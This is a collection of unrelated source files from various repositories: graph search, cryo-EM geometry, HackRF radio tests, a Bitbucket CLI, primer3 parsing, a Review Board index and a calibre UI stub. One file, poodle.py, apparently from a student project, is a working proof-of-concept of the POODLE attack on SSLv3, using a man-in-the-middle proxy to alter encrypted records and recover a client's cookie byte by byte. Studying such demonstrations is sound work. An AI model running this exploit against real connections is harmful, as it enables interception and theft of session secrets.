mycroft-core/test/unittests/stt/test_stt.py
|
Python
|
gpl-3.0
| 5,110 | 0 |
import sys
n, m = map(int, raw_input().strip().split())
v1, v2 = map(int, raw_input().strip().split())
x, y = map(int, raw_input().strip().split())
route_map = {}
distance_map = {}
def get_edge_name(x, y):
if x > y:
x, y = y, x
return str(x) + '_' + str(y)
def get_edge_distance(x,y):
edge_name = get_edge_name(x,y)
if edge_name not in distance_map:
return 0
else:
return distance_map[edge_name][0]
def bike_allowed(x,y):
edge_name = get_edge_name(x,y)
if edge_name in distance_map:
return distance_map[edge_name][1]
else:
return -1
for _ in xrange(m):
r1, r2, d1, b1 = map(int, raw_input().strip().split())
route_map[r1] = route_map.get(r1, [])
route_map[r1].append(r2)
route_map[r2] = route_map.get(r2, [])
route_map[r2].append(r1)
distance_map[get_edge_name(r1, r2)] = [d1, b1]
def get_min_bike_time(x, y, dist_acc=0, visited_nodes=[]):
if x not in route_map or x == y:
return sys.maxsize
visited_nodes.append(x)
dist_direct = sys.maxsize
if y in route_map[x] and bike_allowed(x,y) == 0:
dist_direct = dist_acc + get_edge_distance(x,y)
if True:
dist = [dist_direct]
for elem in route_map[x]:
if bike_allowed(x, elem) == 0 and elem not in visited_nodes:
dist.append(get_min_bike_time(elem, y, dist_acc + get_edge_distance(x, elem), visited_nodes))
else:
continue
return (min(dist) if len(dist) else sys.maxsize)
def get_min_cycle_time(x, y, dist_acc=0, visited_nodes=[]):
if x not in route_map or x == y:
return sys.maxsize
visited_nodes.append(x)
dist_direct = sys.maxsize
if y in route_map[x]:
dist_direct = dist_acc + get_edge_distance(x,y)
if True:
dist = [dist_direct]
for elem in route_map[x] :
if bike_allowed(x, elem) != -1 and elem not in visited_nodes:
dist.append(get_min_cycle_time(elem, y, dist_acc + get_edge_distance(x, elem), visited_nodes))
else:
continue
return (min(dist) if len(dist) else sys.maxsize)
cycle = get_min_cycle_time(x,y)
bike = get_min_bike_time(x,y)
cycle_time = cycle/float(v1)
bike_time = bike/float(v2)
print '------------------'
print bike, cycle
print bike_time, cycle_time
|
shams-sam/logic-lab
|
DfsShortestPath/dfs_solution.py
|
Python
|
mit
| 2,348 | 0.008518 |
import distribute3Sphere
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import logging, sys
from sklearn.neighbors import NearestNeighbors
#from scipy.spatial import Delaunay
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
def get_S2(q):
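    """Map unit quaternions q (a 4 x N array) to the corresponding projection
    directions on the 2-sphere, returned as a 3 x N array."""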
try:
assert(q.shape[0] > 3)
except AssertionError:
_logger.error('subroutine get_S2: q has wrong dimensions')
        _logger.exception('subroutine get_S2: q has wrong dimensions')
sys.exit(1)
raise
# projection angles
S2 = 2*np.vstack((q[1,:]*q[3,:]-q[0,:]*q[2,:],\
q[0,:]*q[1,:]+q[2,:]*q[3,:], \
q[0,:]**2 + q[3,:]**2-0.5))
"""
From the original matlab code:
S2 = 2*[q(2,:).*q(4,:)-q(1,:).*q(3,:);
q(1,:).*q(2,:)+q(3,:).*q(4,:);
q(1,:).^2+q(4,:).^2-0.5];
"""
return S2
def classS2(X,Q):
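    """Assign each row of Q to its nearest neighbour among the rows of X.
    Returns the nearest-neighbour indices IND and the per-reference counts NC."""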
nbrs = NearestNeighbors(n_neighbors=1, algorithm='ball_tree').fit(X)
distances, IND = nbrs.kneighbors(Q)
NC = np.bincount(IND[:,0].squeeze())
return (IND,NC)
def op(q,shAngWidth,PDsizeTh,visual,*fig):
nG = np.floor(4*np.pi / (shAngWidth**2)).astype(int)
# reference angles
S20,it = distribute3Sphere.op(nG)
#print S20.shape
S20 = S20.T
#nS = q.shape[1]
# projection angles
S2 = get_S2(q)
IND, NC = classS2(S20.T, S2.T)
NIND = (NC > PDsizeTh).nonzero()[0]
#sys.exit()
S20_th = S20[:,NIND]
CG = []
for i in xrange(len(NIND)):
a = (IND == NIND[i]).nonzero()[0]
CG.append(a)
if visual:
# fig = plt.figure(figsize=(4,4))
ax = Axes3D(fig)
ax.set_xlim3d(-1, 1)
ax.set_ylim3d(-1, 1)
ax.set_zlim3d(-1, 1)
for i in xrange(np.floor(CG.shape[1]) / 2):
a = CG[i]
ax.scatter(S2(1, a[::40]), S2(1, a[::40]), S2(2, a[::40]),marker='o',s=20,alpha=0.6)
return (CG, nG,S20_th)
#if __name__ == '__main__':
# op(ang,df,Shan_width,visual,GCnum,fig,flip=True)
|
hstau/manifold-cryo
|
S2tessellation.py
|
Python
|
gpl-2.0
| 1,976 | 0.039474 |
import time
import unittest
import os
import tempfile
import numpy as np
from urh.util import util
util.set_windows_lib_path()
from urh.dev.native.lib import hackrf
from urh.dev.native.HackRF import HackRF
class TestHackRF(unittest.TestCase):
def callback_fun(self, buffer):
print(buffer)
for i in range(0, len(buffer), 4):
try:
r = np.fromstring(buffer[i:i + 2], dtype=np.float16) / 32767.5
i = np.fromstring(buffer[i + 2:i + 4], dtype=np.float16) / 32767.5
except ValueError:
continue
if r and i:
print(r, i)
# out.append(complex(float(buffer[i:i+1])/32767.5, float(buffer[i+2:i+3])/32767.5))
return 0
def test_fromstring(self):
buffer = b'\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xff\xfd\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe\xfd\xfe\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe'
r = np.empty(len(buffer) // 2, dtype=np.float32)
i = np.empty(len(buffer) // 2, dtype=np.float32)
c = np.empty(len(buffer) // 2, dtype=np.complex64)
# dtype =
unpacked = np.frombuffer(buffer, dtype=[('r', np.uint8), ('i', np.uint8)])
ru = unpacked['r'] / 128.0
iu = unpacked['i'] / 128.0
# for j in range(0, len(buffer)-1, 2):
# r[j//2] = np.frombuffer(buffer[j:j + 1], dtype=np.int8) / 128.0
# i[j//2] = np.frombuffer(buffer[j + 1:j + 2], dtype=np.int8) / 128.0
# r2 = np.fromstring(buffer[], dtype=np.float16) / 32767.5
c.real = ru
c.imag = iu
print(c)
# x,y = np.frombuffer(buffer, dtype=[('x', np.float16), ('y', np.float16)])
def test_fromstring2(self):
buffer = b'\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xff\xfd\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe\xfd\xfe\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe'
c = np.empty(len(buffer) // 2, dtype=np.complex64)
# dtype =
unpacked = np.frombuffer(buffer, dtype="<h") # cast in short
print(unpacked)
f = 1.0/32767.5
for i in range(0, len(unpacked)-1,2):
c[i] = complex(float(unpacked[i]*f), float(unpacked[i+1]*f))
print(c)
# x,y = np.frombuffer(buffer, dtype=[('x', np.float16), ('y', np.float16)])
def test_hackrf_class_recv(self):
hfc = HackRF(433.92e6, 1e6, 1e6, 20)
hfc.start_rx_mode()
i = 0
TIME_TOTAL = 5
while i <TIME_TOTAL:
print("{0}/{1}".format(i+1, TIME_TOTAL))
time.sleep(1)
i+=1
print("{0:,}".format(hfc.current_recv_index))
hfc.received_data.tofile(os.path.join(tempfile.gettempdir(), "hackrf.complex"))
print("Wrote Data")
hfc.stop_rx_mode("Finished test")
def test_hackrf_class_send(self):
hfc = HackRF(433.92e6, 1e6, 1e6, 20)
hfc.start_tx_mode(np.fromfile(os.path.join(tempfile.gettempdir(), "hackrf.complex"),
dtype=np.complex64), repeats=1)
while not hfc.sending_finished:
print("Repeat: {0} Current Sample: {1}/{2}".format(hfc.current_sending_repeat+1,
hfc.current_sent_sample,
len(hfc.samples_to_send)))
time.sleep(1)
hfc.stop_tx_mode("Test finished")
def test_hackrf_pack_unpack(self):
arr = np.array([-128, -128, -0.5, -0.5, -3, -3, 127, 127], dtype=np.int8)
self.assertEqual(arr[0], -128)
self.assertEqual(arr[1], -128)
self.assertEqual(arr[-1], 127)
received = arr.tostring()
self.assertEqual(len(received), len(arr))
self.assertEqual(np.int8(received[0]), -128)
self.assertEqual(np.int8(received[1]), -128)
unpacked = HackRF.unpack_complex(received, len(received) // 2)
self.assertEqual(unpacked[0], complex(-1, -1))
self.assertAlmostEqual(unpacked[1], complex(0, 0), places=1)
self.assertAlmostEqual(unpacked[2], complex(0, 0), places=1)
self.assertEqual(unpacked[3], complex(1, 1))
packed = HackRF.pack_complex(unpacked)
self.assertEqual(received, packed)
def test_c_api(self):
def callback(n):
print("called")
return np.array([1], dtype=np.complex64)
print("init", hackrf.init())
print("open", hackrf.open())
print("start_tx", hackrf.start_tx_mode(callback))
time.sleep(1)
print("stop_tx", hackrf.stop_tx_mode())
print("close", hackrf.close())
print("exit", hackrf.exit())
if __name__ == "__main__":
unittest.main()
|
splotz90/urh
|
tests/HackRFTests.py
|
Python
|
gpl-3.0
| 4,709 | 0.004247 |
# Copyright (c) 2013 Yogesh Panchal, yspanchal@gmail.com
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import logging
import requests
from cliff.command import Command
from .utils import read_creds
class Wikiget(Command):
"""
* Get wiki page created for repository
"""
log = logging.getLogger(__name__ + '.Wikiget')
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
def get_parser(self, prog_name):
parser = super(Wikiget, self).get_parser(prog_name)
parser.add_argument(
'--account',
'-a',
metavar='<account name>',
required=True,
help='Your account name')
parser.add_argument(
'--reponame',
'-r',
metavar='<repo name>',
required=True,
help='The repository name')
parser.add_argument(
'--page',
'-p',
metavar='<page name>',
required=True,
help='The page title')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action({a})'.format(a=parsed_args))
url = ("https://bitbucket.org/api/1.0/"
"repositories/{a.account}/{a.reponame}/"
"wiki/{a.page}/").format(a=parsed_args)
user, passwd = read_creds()
r = requests.get(url, auth=(user, passwd))
if r.status_code == 200:
data = json.loads(r.text)
msg = """
Markup: {d[markup]}
Revision: {d[rev]}
Page Content: {d[data]}
"""
print(msg.format(d=data))
else:
print("\n Error: '404' No Wiki Pages Found"
" 'or' Invalid argument supplied.\n")
sys.exit(1)
class Wikipost(Command):
"""
* Post new wiki page for repositorys
"""
log = logging.getLogger(__name__ + '.Wikipost')
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
def get_parser(self, prog_name):
parser = super(Wikipost, self).get_parser(prog_name)
parser.add_argument(
'--account',
'-a',
metavar='<account name>',
required=True,
help='Your account name')
parser.add_argument(
'--reponame',
'-r',
metavar='<repo name>',
required=True,
help='The repository name')
parser.add_argument(
'--page',
'-p',
metavar='<page name>',
required=True,
help='The page title')
parser.add_argument(
'--content',
'-c',
metavar='<page content>',
required=True,
help='The page content')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action({a}s)'.format(a=parsed_args))
args = {}
args['content'] = parsed_args.content
url = ("https://bitbucket.org/api/1.0/"
"repositories/{a.account}/{a.reponame}/"
"wiki/{a.page}/").format(a=parsed_args)
user, passwd = read_creds()
r = requests.post(url, data=args, auth=(user, passwd))
print(r.text)
if r.status_code == 200:
print("\n Wiki Page Created Successfully.\n")
else:
msg = ("\n Error: '{r.status_code}' "
"Something Went Wrong -- Bitbucket.\n")
print(msg.format(r=r))
sys.exit(1)
|
yspanchal/bitbucketcli
|
bitbucket/wiki.py
|
Python
|
apache-2.0
| 4,056 | 0.000247 |
"""
Functions:
primer3
primer3_core
parse
"""
import sys
def primer3(sequence, **params):
# See primer3_core for more options.
# Return list of (left_primer, right_primer, product_size)
from StringIO import StringIO
handle = StringIO()
primer3_core(sequence, outhandle=handle, **params)
handle.seek(0)
#print handle.read(); sys.exit(0)
return parse(handle)
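# Example (illustrative): pick up to three primer pairs for a 150-250 bp
# product around a target region:
#   pairs = primer3(seq, product_size=(150, 250), num_return=3,
#                   target=(100, 50))
#   for left, right, size in pairs:
#       print left.seq, right.seq, size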
def primer3_core(
sequence, product_size=None, num_return=None, target=None,
format_output=None, primer3_core_app=None, outhandle=None, **params):
# product_size (75, 100) or [(100,125),(150,300)] default 100-300
# num_return 5 default 5
# target (25, 50) target base 25 (1-based), length 50
import subprocess
import config
primer3_core_app = primer3_core_app or config.primer3
outhandle = outhandle or sys.stdout
# Set the parameters to the webpage defaults.
#
# Can reproduce results on web site if we set on the website:
# Targets
# Product Size Ranges
#
# Default Product Size Range for web is:
# 150-250 100-300 301-400 401-500 501-600 601-700 701-850 851-1000
defaults = {
"PRIMER_MAX_END_STABILITY" : 9.0,
"PRIMER_MAX_TEMPLATE_MISPRIMING" : 12.00,
"PRIMER_PAIR_MAX_TEMPLATE_MISPRIMING" : 24.00,
"PRIMER_LIBERAL_BASE" : 1,
"PRIMER_LIB_AMBIGUITY_CODES_CONSENSUS" : 0,
"PRIMER_QUALITY_RANGE_MAX" : 100,
#"PRIMER_PAIR_WT_IO_PENALTY" : 1.0,
}
for name, value in defaults.iteritems():
params[name] = params.get(name, value)
cmd = [primer3_core_app]
if format_output:
cmd.append("-format_output")
cmd.append("-strict_tags")
cmd = " ".join(cmd)
p = subprocess.Popen(
cmd, shell=True, bufsize=0, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
w, r = p.stdin, p.stdout
w.write("SEQUENCE_ID=test\n")
#w.write("SEQUENCE=%s\n" % sequence) # obsolete
w.write("SEQUENCE_TEMPLATE=%s\n" % sequence)
if target is not None:
assert len(target) == 2
base, length = target
assert base-1+length <= len(sequence)
w.write("SEQUENCE_TARGET=%d,%d\n" % (base, length))
if product_size:
# Figure out if it's a tuple or a list of tuples.
if type(product_size[0]) is type(0):
assert len(product_size) == 2
product_size = [product_size]
for x in product_size:
assert len(x) == 2
# Format the product size.
# space separated listed of <x>-<y>
sizes = ["%d-%d" % x for x in product_size]
x = " ".join(sizes)
w.write("PRIMER_PRODUCT_SIZE_RANGE=%s\n" % x)
if num_return is not None:
assert num_return >= 1
w.write("PRIMER_NUM_RETURN=%d\n" % num_return)
for name, value in params.iteritems():
w.write("%s=%s\n" % (name, value))
w.write("=\n")
w.close()
for line in r:
outhandle.write(line)
class PrimerInfo:
# o pos is 0-based.
# o The right primer is 5' to 3' for the primer. Need to revcomp
# to compare against the original sequence.
# o The position of right primer is relative to the 5' end of the
# primer (3' end of the sequence). To get the position of the
# primer on a 0-based sequence, do:
# pos - length + 1
def __init__(self, seq, pos, length, tm, gc_percent):
self.seq = seq
self.pos = pos
self.length = length
self.tm = tm
self.gc_percent = gc_percent
def _parse_h(handle):
# Yield: None or <num>, key, value
import re
for line in handle:
assert not line.startswith("Unrecognized"), line.rstrip()
assert "=" in line, line.strip()
key, value = line.split("=", 1)
key, value = key.strip(), value.strip()
if not key and not value:
break
primer_id = None
m = re.search(r"_(\d+)", key)
if m:
primer_id = int(m.group(1))
yield primer_id, key, value
def parse(handle):
# Return list of (left (PrimerInfo), right (PrimerInfo), product_size).
import re
# Which input parameters to ignore.
#input_keys = [
# "SEQUENCE", "PRIMER_PRODUCT_SIZE_RANGE", "PRIMER_NUM_RETURN"]
def data2obj(data, whichone):
#print "START"
#for k in data.keys():
# print k
#print "END"
seq = data["PRIMER_%s_SEQUENCE" % whichone]
x = data["PRIMER_%s" % whichone]
x, y = x.split(",")
pos = int(x)
length = int(y)
tm = float(data["PRIMER_%s_TM" % whichone])
gc_percent = float(data["PRIMER_%s_GC_PERCENT" % whichone])
return PrimerInfo(seq, pos, length, tm, gc_percent)
primers = []
PRODUCT_SIZE = "PRIMER_PAIR_PRODUCT_SIZE"
data = {} # key -> value
prev_primer_id = None
for primer_id, key, value in _parse_h(handle):
if primer_id != prev_primer_id:
if prev_primer_id is not None:
left_primer = data2obj(data, "LEFT")
right_primer = data2obj(data, "RIGHT")
product_size = int(data.get(PRODUCT_SIZE, 0))
x = left_primer, right_primer, product_size
primers.append(x)
data = {}
prev_primer_id = primer_id
# PRIMER_PAIR_1_PENALTY -> PRIMER_PAIR_PENALTY
# PRIMER_LEFT_1 -> PRIMER_LEFT
key = re.sub(r"_\d+", "", key)
data[key] = value
if primer_id is not None:
left_primer = data2obj(data, "LEFT")
right_primer = data2obj(data, "RIGHT")
product_size = int(data.get(PRODUCT_SIZE, 0))
x = left_primer, right_primer, product_size
primers.append(x)
return primers
|
jefftc/changlab
|
genomicode/primer3.py
|
Python
|
mit
| 5,865 | 0.004774 |
from temboo.Library.Nexmo.Voice.CaptureTextToSpeechPrompt import CaptureTextToSpeechPrompt, CaptureTextToSpeechPromptInputSet, CaptureTextToSpeechPromptResultSet, CaptureTextToSpeechPromptChoreographyExecution
from temboo.Library.Nexmo.Voice.ConfirmTextToSpeechPrompt import ConfirmTextToSpeechPrompt, ConfirmTextToSpeechPromptInputSet, ConfirmTextToSpeechPromptResultSet, ConfirmTextToSpeechPromptChoreographyExecution
from temboo.Library.Nexmo.Voice.TextToSpeech import TextToSpeech, TextToSpeechInputSet, TextToSpeechResultSet, TextToSpeechChoreographyExecution
|
jordanemedlock/psychtruths
|
temboo/core/Library/Nexmo/Voice/__init__.py
|
Python
|
apache-2.0
| 565 | 0.00531 |
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser
from django.db.models import Q
from haystack import indexes
from reviewboard.reviews.models import ReviewRequest
from reviewboard.search.indexes import BaseSearchIndex
class ReviewRequestIndex(BaseSearchIndex, indexes.Indexable):
"""A Haystack search index for Review Requests."""
model = ReviewRequest
local_site_attr = 'local_site_id'
# We shouldn't use 'id' as a field name because it's by default reserved
# for Haystack. Hiding it will cause duplicates when updating the index.
review_request_id = indexes.IntegerField(model_attr='display_id')
summary = indexes.CharField(model_attr='summary')
description = indexes.CharField(model_attr='description')
testing_done = indexes.CharField(model_attr='testing_done')
commit_id = indexes.EdgeNgramField(model_attr='commit', null=True)
bug = indexes.CharField(model_attr='bugs_closed')
username = indexes.CharField(model_attr='submitter__username')
author = indexes.CharField()
last_updated = indexes.DateTimeField(model_attr='last_updated')
url = indexes.CharField(model_attr='get_absolute_url')
file = indexes.CharField()
# These fields all contain information needed to perform queries about
# whether a review request is accessible by a given user.
private = indexes.BooleanField()
private_repository_id = indexes.IntegerField()
private_target_groups = indexes.MultiValueField()
target_users = indexes.MultiValueField()
def get_model(self):
"""Returns the Django model for this index."""
return ReviewRequest
def get_updated_field(self):
return 'last_updated'
def index_queryset(self, using=None):
"""Index only public pending and submitted review requests."""
return (
self.get_model().objects
.public(status=None,
show_all_local_sites=True,
show_inactive=True,
filter_private=False)
.select_related('diffset_history',
'local_site',
'repository',
'submitter',
'submitter__profile')
.prefetch_related('diffset_history__diffsets__files',
'target_groups',
'target_people')
)
def prepare_file(self, obj):
return set([
(filediff.source_file, filediff.dest_file)
for diffset in obj.diffset_history.diffsets.all()
for filediff in diffset.files.all()
])
def prepare_private(self, review_request):
"""Prepare the private flag for the index.
This will be set to true if the review request isn't generally
accessible to users.
"""
return not review_request.is_accessible_by(AnonymousUser(),
silent=True)
def prepare_private_repository_id(self, review_request):
"""Prepare the private repository ID, if any, for the index.
If there's no repository, or it's public, 0 will be returned instead.
"""
if review_request.repository and not review_request.repository.public:
return review_request.repository_id
else:
return 0
def prepare_private_target_groups(self, review_request):
"""Prepare the list of invite-only target groups for the index.
If there aren't any invite-only groups associated, ``[0]`` will be
returned. This allows queries to be performed that check that none
of the groups are private, since we can't query against empty lists.
"""
return [
group.pk
for group in review_request.target_groups.all()
if group.invite_only
] or [0]
def prepare_target_users(self, review_request):
"""Prepare the list of target users for the index.
If there aren't any target users, ``[0]`` will be returned. This
allows queries to be performed that check that there aren't any
users in the list, since we can't query against empty lists.
"""
return [
user.pk
for user in review_request.target_people.all()
] or [0]
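# Added illustration (not part of Review Board): the [0] sentinel above lets
# accessibility checks be written as value matches instead of empty-list tests,
# e.g. a hypothetical Haystack filter such as
#   SearchQuerySet().filter(SQ(target_users=0) | SQ(target_users__in=[user.pk]))
# where SearchQuerySet and SQ come from haystack.query.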
def prepare_author(self, review_request):
"""Prepare the author field.
Args:
review_request (reviewboard.reviews.models.review_request.
ReviewRequest):
The review request being indexed.
Returns:
unicode:
Either the author's full name (if their profile is public) or an
empty string.
"""
user = review_request.submitter
profile = user.get_profile(cached_only=True)
if profile is None or profile.is_private:
return ''
return user.get_full_name()
| chipx86/reviewboard | reviewboard/reviews/search_indexes.py | Python | mit | 5,009 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Poodle implementation with a client <--> proxy <--> server
'''
import argparse
import random
import re
import select
import socket
import SocketServer
import ssl
import string
import sys
import struct
import threading
import time
from utils.color import draw
from pprint import pprint
from struct import *
class SecureTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
self.request = ssl.wrap_socket(self.request, keyfile="cert/localhost.pem", certfile="cert/localhost.pem", server_side=True, ssl_version=ssl.PROTOCOL_SSLv3)
#loop to avoid broken pipe
while True:
try:
data = self.request.recv(1024)
if data == '':
break
self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server that serves on its host and port, waiting for the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server.
Inform the attacker about the client's frames and the server's responses.
Finally, forward the data from the client to the server and vice versa.
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknown, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
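# Added note (sketch of the standard POODLE byte-recovery relation, not text
# from the original author): when the copied block C_i is accepted by the
# server as the final padding block, its last decrypted byte must equal
# (block_length - 1) after XOR with the last byte of the preceding ciphertext
# block, so
#     P_i[-1] = C_(i-1)[-1] XOR C_(n-1)[-1] XOR (block_length - 1)
# which is exactly the three-way XOR computed in decipher() below.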
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str(self.frame)
return self.frame
def set_decipherable(self, status):
self.decipherable = status
return
def set_length_frame(self, data):
self.frame = data
self.length_frame = len(data)
def client_connection(self):
self.client.connection()
return
def send_request_from_the_client(self, path=0, data=0):
self.client.request(path,data)
return
def client_disconect(self):
self.client.disconnect()
return
if __name__ == '__main__':
plan = """\
+-----------------+ +------------+ +-----------+
| +-------> | +--------> | |
| Client | | Proxy | | Server |
| | <-------+ | <--------+ |
+-----------------+ +---+---+----+ +-----------+
| |
^ | |
| +-----v---+------+
| | |
--+----------+ Attacker |
inject javascript | |
+----------------+
"""
parser = argparse.ArgumentParser(description='Connection with SSLv3')
parser.add_argument('host', help='hostname or IP address')
parser.add_argument('port', type=int, help='TCP port number')
parser.add_argument('-v', help='debug mode', action="store_true")
args = parser.parse_args()
print plan + "\n"
server = Server(args.host, args.port)
client = Client(args.host, args.port+1)
spy = Proxy(args.host, args.port+1)
poodle = Poodle(client)
server.connection()
spy.connection()
poodle.run()
spy.disconnect()
server.disconnect()
| rtbn/TER_Project | poodle-PoC/poodle.py | Python | gpl-2.0 | 12,158 | 0.005511 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/yc/code/calibre/calibre/src/calibre/gui2/wizard/library.ui'
#
# Created: Thu Oct 25 16:54:55 2012
# by: PyQt4 UI code generator 4.8.5
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_WizardPage(object):
def setupUi(self, WizardPage):
WizardPage.setObjectName(_fromUtf8("WizardPage"))
WizardPage.resize(481, 300)
WizardPage.setWindowTitle(_("WizardPage"))
WizardPage.setTitle(_("Welcome to calibre"))
WizardPage.setSubTitle(_("The one stop solution to all your e-book needs."))
self.gridLayout = QtGui.QGridLayout(WizardPage)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label_3 = QtGui.QLabel(WizardPage)
self.label_3.setText(_("Choose your &language:"))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.language = QtGui.QComboBox(WizardPage)
self.language.setObjectName(_fromUtf8("language"))
self.gridLayout.addWidget(self.language, 0, 1, 1, 2)
self.libloc_label1 = QtGui.QLabel(WizardPage)
self.libloc_label1.setText(_("<p>Choose a location for your books. When you add books to calibre, they will be copied here. Use an <b>empty folder</b> for a new calibre library:"))
